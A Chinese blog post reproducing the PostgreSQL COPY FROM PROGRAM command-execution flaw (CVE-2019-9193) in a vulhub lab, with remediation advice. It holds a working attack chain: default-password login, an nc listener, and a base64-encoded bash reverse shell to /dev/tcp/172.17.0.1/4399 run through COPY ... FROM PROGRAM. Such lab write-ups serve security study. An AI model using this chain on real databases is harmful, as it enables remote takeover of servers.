CVE-2019-9193 PostgreSQL 高权限命令执行漏洞

最新推荐文章于 2024-06-18 11:01:11 发布
最新推荐文章于 2024-06-18 11:01:11 发布
阅读量655 收藏 2
点赞数 1
文章标签: postgresql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51979295/article/details/133688962
版权
本文详细描述了PostgreSQL9.3及以上版本的高权限命令执行漏洞,攻击者利用COPYTO/FROMPROGRAM功能执行任意系统命令。文章演示了漏洞利用过程,并提供了针对该漏洞的修复建议,如限制角色权限、强化密码和网络隔离。
摘要由CSDN通过智能技术生成

CVE-2019-9193 PostgreSQL 高权限命令执行漏洞复现

一、漏洞介绍

任意命令执行:具有数据库服务器文件读取权限的攻击者可以利用此漏洞执行任意系统命令。

从 9.3 版本开始,Postgres 新增了一个 COPY TO/FROM PROGRAM 功能,允许数据库的超级用户以及 pg_read_server_files 组中的任何用户执行操作系统命令。

漏洞利用前提:

需要登陆;

需要高权限;

二、影响版本

受影响的版本(貌似更新版本无解)

PostgreSQL >= 9.3

漏洞复现

攻击机:kali(172.17.0.1)
靶机:kali使用docker-compose搭建的vulhub环境 postgres(0.0.0.0:5432)

docker-compose准备靶场

请添加图片描述

可以看到此时靶场映射到我本机的5432端口

弱密码登录

postgres是postgreSQL的默认用户及密码。

psql 连接PostgreSQL命令
-U 用户名-h 目标IP-p目标端口

在kali中输入命令psql -U postgres -h 0.0.0.0 -p 5432,待提示输入口令后 输入密码postgres

请添加图片描述

反弹SHELL

我要让目标服务器打开一个终端,并将终端的输入输出重定向至我kali机的4399端口

先开启kali监听nc -lvvp 4399
请添加图片描述

构造反弹shell语句:/bin/bash -i >& /dev/tcp/172.17.0.1/4399 0>&1

bash -i 打开一个交互的bash
& 将标准错误输出重定向到标准输出
/dev/tcp/x.x.x.x/xxx 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口
0>&1 0是文件描述符,标准输入重定向到标准输出,实现你与反弹出来的shell的交互

由于特殊符号可能被转义,所以用base64编码

/bin/bash -i >& /dev/tcp/172.17.0.1/4399 0>&1YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTcuMC4xLzQzOTkgMD4mMQ==

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjEvNDM5OSAwPiYx" | base64 -d | bash'; 
SELECT * FROM cmd_exec;

请添加图片描述

此时kali已收到监听

请添加图片描述

漏洞修复

1,pg_read_server_files,pg_write_server_files 和 pg_execute_server_program 角色涉及读取和写入具有大权限的数据库服务器文件。将此角色权限分配给数据库用户时,应慎重考虑;

2,增强密码的复杂度;

3,进行网络隔离,限制 IP 访问,只允许需要的 IP 连接;

J1yabe
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
漏洞复现】PostgreSQL权限命令执行(CVE-2019-9193)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-01 393
这个漏洞是一个版本漏洞从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令利用的前提1、需要登录2、需要权限所以要先弱口令爆破之后,然后查看是否是权限
CVE-2019-9193PostgreSQL 权限命令执行漏洞
m0_48520508的博客
01-20 885
0x00简介 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL特点: Ø 支持WINDOWS、Linux、Solaris、macOS 、BSD。 Ø 支持文本、图像、视频、声音等 Ø 支持ACID、关联完整性、数据库事务、Unicode多国语言。 Ø 支持临时表,与物化视图 Ø 支持SQL的许多功
CVECVE-2019-9193PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3713
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
Web安全基础学习:SQL注入漏洞PostgreSql注入
最新发布
qq_51862722的博客
06-18 1200
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
PostgreSQL 权限命令执行漏洞CVE-2019-9193
EC_Carrot的博客
07-21 454
漏洞简介 PostgreSQLPostgreSQL组织的一套自由的对象关系型数据库管理系统。该系统支持大部分SQL标准并且提供了许多其他特性,例如外键、触发器、视图等。 PostgreSQL 9.3至11.2版本中的导入导出数据命令‘COPY TO/FROM PROGRAM’存在操作系统命令注入漏洞。攻击者可利用该漏洞获取数据库超级用户权限,从而执行任意系统命令漏洞复现 我使用的是vulhub的环境,默认账号密码为postgres/postgres 登陆PostgreSQL:psql --host y
CVE-2019-9193PostgreSQL 权限命令执行漏洞的复现
m0_69801663的博客
12-23 1134
CVE-2019-9193PostgreSQL 权限命令执行漏洞
PostgreSQL权限命令执行(CVE-2019-9193)漏洞复现&实战
jihaichen的博客
04-26 2764
一、漏洞利用 这个漏洞是一个版本漏洞 从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作 系统命令,利用的前提 1、需要登录2、需要权限 所以要先弱口令爆破之后,然后查看是否是权限。 这里之所以选择复现这个漏洞,因为其中的思路比较有意思,也就是看回显的思路。 先大体讲一下这个漏洞是怎么看回显的,他是通过命令执行然后把回显写入创建的一张表里面,下面来具体操作。 先删除你
OpenSSH 存在输入验证错误漏洞(CVE-2019-16905)修复补丁及命令
01-15
2019年,OpenSSH被发现存在一个名为CVE-2019-16905的输入验证错误漏洞。这个漏洞允许攻击者通过精心构造的公钥文件,可能导致服务崩溃或者可能执行任意代码,对系统安全构成严重威胁。为了保护系统免受此漏洞的...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1055
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
PostgreSQL 权限命令执行漏洞复现(CVE-2019-9193)
又菜又爱倒腾的博客
10-29 1798
#PostgreSQL 权限命令执行漏洞(CVE-2019-9193)# 一、漏洞简介 PostgreSQL是功能强大的数据库软件,可在所有主要操作系统上运行,包括Linux,Windows,Mac OS X等。所公开的漏洞存在于命令“COPY TO / FROM PROGRAM”中,用于导入和导出数据。在“pg_read_server_files”组中的用户执行上述命令之后,可以获得数据库超级用户权限,从而执行任何系统命令。 二、漏洞影响 影响版本 PostgreSQL 9.3-11.2 三、产生原因
CVE-2019-9193权限远程命令执行漏洞)vulhub复现
qq_52279315的博客
05-17 580
vulhub靶场复现【postgresql
PostgreSQL 权限命令执行漏洞CVE-2019-9193)复现
技术超强的网络安全平台
08-01 372
PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。 进入目录
buuctf [Postgres]CVE-2019-9193
qq_1873822的博客
04-02 564
漏洞描述 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL特点: 支持WINDOWS、Linux、Solaris、macOS 、BSD。 支持文本、图像、视频、声音等 支持ACID、关联完整性、数据库事务、Unicode多国语言。 支持临时表,与物化视图 支持SQL的许多功能,例如复杂的SQL查询
Postgresql漏洞合集
weixin_46626737的博客
07-03 858
需要超级管理员数据库用户(postgres)才可以,因为在9.3版本之后,默认得开启了COPY TO/FROM PROGRAM功能,可以让超级用户去执行任意系统命令。2.PostgreSQL 权限命令执行漏洞CVE-2019-9193)1.PostgreSQL 提权漏洞CVE-2018-1058)漏洞版本:9.3-11.2。漏洞版本:9.3-10。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值